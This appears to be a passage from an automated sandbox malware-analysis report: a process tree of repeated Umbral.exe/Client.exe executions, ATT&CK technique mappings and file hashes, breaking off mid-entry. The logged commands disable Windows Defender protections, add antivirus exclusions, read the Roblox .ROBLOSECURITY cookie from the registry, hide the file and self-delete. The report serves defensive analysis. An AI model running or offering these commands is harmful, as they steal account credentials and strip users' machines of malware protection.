        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        
        PID:3152
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        20⤵
        
        PID:1492
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        20⤵
        
        PID:1336
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        20⤵
        
        PID:3856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        20⤵
        
        PID:3756
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        20⤵
        Detects videocard installed
        
        PID:3568
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        20⤵
        
        PID:1224
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        21⤵
        
        PID:4844
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        21⤵
        Runs ping.exe
        
        PID:4588
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        19⤵
        Executes dropped EXE
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        18⤵
        Executes dropped EXE
        
        PID:4116
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        18⤵
        Executes dropped EXE
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        17⤵
        Executes dropped EXE
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        17⤵
        Executes dropped EXE
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        16⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:2880
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        17⤵
        Views/modifies file attributes
        
        PID:464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        17⤵
        
        PID:1500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        
        PID:5100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        
        PID:1548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        17⤵
        
        PID:3332
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        17⤵
        
        PID:1456
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:4568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        17⤵
        
        PID:4588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        17⤵
        Detects videocard installed
        
        PID:2636
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:464
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        17⤵
        
        PID:4576
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        18⤵
        Runs ping.exe
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        16⤵
        Executes dropped EXE
        
        PID:3896
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        15⤵
        Executes dropped EXE
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        15⤵
        Executes dropped EXE
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        14⤵
        Executes dropped EXE
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        14⤵
        Executes dropped EXE
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        13⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4176
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        14⤵
        
        PID:4844
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        14⤵
        Views/modifies file attributes
        
        PID:4440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        14⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2248
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        14⤵
        
        PID:516
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        14⤵
        
        PID:4212
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        14⤵
        
        PID:2416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        14⤵
        
        PID:4428
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        14⤵
        Detects videocard installed
        
        PID:1332
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        14⤵
        
        PID:3092
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        15⤵
        Runs ping.exe
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        13⤵
        Executes dropped EXE
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        Executes dropped EXE
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        12⤵
        Executes dropped EXE
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        11⤵
        Executes dropped EXE
        
        PID:472
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        11⤵
        Executes dropped EXE
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        10⤵
        Executes dropped EXE
        
        PID:1092
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        10⤵
        Executes dropped EXE
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1896
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        10⤵
        
        PID:3960
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        10⤵
        Views/modifies file attributes
        
        PID:1224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2924
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:4712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2824
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        10⤵
        
        PID:3720
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        10⤵
        
        PID:3208
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        10⤵
        
        PID:4608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:1224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1468
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        10⤵
        Detects videocard installed
        
        PID:4532
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        10⤵
        
        PID:4692
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        11⤵
        Runs ping.exe
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        9⤵
        Executes dropped EXE
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        8⤵
        Executes dropped EXE
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        8⤵
        Executes dropped EXE
        
        PID:2924
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        7⤵
        Executes dropped EXE
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        7⤵
        Executes dropped EXE
        
        PID:2156
      - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:2824
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2308
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4372
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:1468
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:4712
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:1492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4116
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:1856
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        7⤵
        
        PID:916
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        Runs ping.exe
        
        PID:472
      - C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        6⤵
        Executes dropped EXE
        
        PID:3628
    - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        5⤵
        Executes dropped EXE
        
        PID:4168
    - - C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        5⤵
        Executes dropped EXE
        
        PID:948
  - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Executes dropped EXE
      PID:5088
  - - C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      4⤵
      Executes dropped EXE
      PID:4212
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Executes dropped EXE
    PID:3916
- - C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    3⤵
    - Executes dropped EXE
    PID:4440
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3360
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4508
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:2192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1104
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3628
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3892
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:464
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4768
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2308
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2736
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:1896
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  PID:4608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3948,i,2113996974559895641,18156918660790954073,262144 --variations-seed-version --mojo-platform-channel-handle=4416 /prefetch:8
1⤵
PID:3132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

Filesize
871B

MD5
386677f585908a33791517dfc2317f88

SHA1
2e6853b4560a9ac8a74cdd5c3124a777bc0d874e

SHA256
7caf8779608c167ab6fa570df00c973aff6dee850bb63439770889a68c7cdae0

SHA512
876d2269e25a4b2754bdf2c7e3c410050f885d7e6bd8abce41c5fc74ae1f8c549b2266dd1588c750f614063f36c8a8e5008cea610505897d04e4ef5c3adc52d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SolaraBootstrapper.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e67c068edb1b25134201027ba89b5151

SHA1
797cacd7ed983481b4ba85a870a519db06a56799

SHA256
d20e66ec8380b25e0f4cddbce17204e3e52ec7f476bb7dd62237fa5a7ac5f1fd

SHA512
287a2cb9816d1794f96801df515e1b56e0c355972b2fb3a5e2fe5535bff3960148eee4789f3319a19018b0e4a3baadf42db6bc14c2685f30e62b58102702d05c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c6aae9fb57ebd2ae201e8d174d820246

SHA1
58140d968de47bcf9c78938988a99369bbdb1f51

SHA256
bbc39a8da61fd8ec0d64e708e1ab4986f7fdf580581e464629bf040c595f7c08

SHA512
5959f7dab47bc4bad03635f497ca48f2e0740375528afddfc50964e54983e56df5970b25b8d8b28f1aa73cd6233fac83c634a311e759c58a365570e4862c3e3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
74a6b79d36b4aae8b027a218bc6e1af7

SHA1
0350e46c1df6934903c4820a00b0bc4721779e5f

SHA256
60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

SHA512
60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f251131b04a417bf2fd3f3fd3068844c

SHA1
fe3f27a36de77426e3183fe44134a0717946e9b0

SHA256
ce41eafa612cf81b9932102ee5bc99caeb1bc900dcc1bf726c8ce3a20fb90363

SHA512
4162439e0db4603683fb41d33e56c28db86c4023dc35ff4f81b20ea87dd06b450bdcc27adb505eb27906ca94d21460944c78fc0861e94aaf665d25dec781b6ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
36bb833bcefdd2f80a289fc681c87627

SHA1
4204fa10680f0a9c2699a9eb52709db1cd68e0b7

SHA256
52be5401760e6cc30c6018d277e7ce91aa262b3888297f76e95a20fdda8e2ae6

SHA512
233fbb528d3b7196fb967fff74e66dd589b6a302e97774a24fbeb971996aa6c1b17f24f19380873c976978552e245b3dd065cdb9d4133ce554c507d92f8778e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
994d48c590292933efa0627922c9fc59

SHA1
696a9fed9578a4f0f73e598f9d71a0c1f9d04090

SHA256
